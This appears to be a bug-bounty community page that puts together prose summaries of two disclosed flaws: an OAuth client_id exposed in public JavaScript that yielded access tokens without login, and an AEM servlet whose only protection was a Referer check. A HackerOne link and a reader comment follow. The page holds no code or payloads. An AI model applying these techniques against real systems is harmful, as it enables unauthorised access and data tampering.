Vulnerability Summary
What started as a simple JavaScript analysis ended in a broken OAuth flow that allowed unauthenticated access to protected APIs — and a €1500 bug bounty reward.
While performing reconnaissance on a web application, I discovered that it was possible to obtain a valid OAuth access token without any authentication.
The issue started with a publicly accessible JavaScript file exposing an OAuth client_id.
Using this identifier, the authorization server issued a valid access token without requiring any user authentication.
The token could then be used to interact with protected backend APIs that executed real business logic.
pyus3rAn unauthenticated AEM Sling servlet exposes four CRUD operations (getData / getDataById / setData / updateData) on the internal marketing-campaign database via a single option request header. The only access control is a Referer string check that any HTTP client trivially bypasses. Anonymous attackers can read the full 79-campaign dataset (including internal segmentation logic and the names of internal prospect databases), create arbitrary new campaigns in the production backoffice, and overwrite existing real production campaigns.
hackerone-reportsHackerOne disclosed report --> https://hackerone.com/reports/3676308 by glferreira-devsecops
gpk21
Great write-up! It's quite interesting how by digging into JS files it's possible to obtain sensitive information such as the client_id and to escalate privileges accessing to protected API endpoints. It requires critical thinking and good eye to detail. Thanks for sharing!
<3
Log in to join the discussion.
Sign In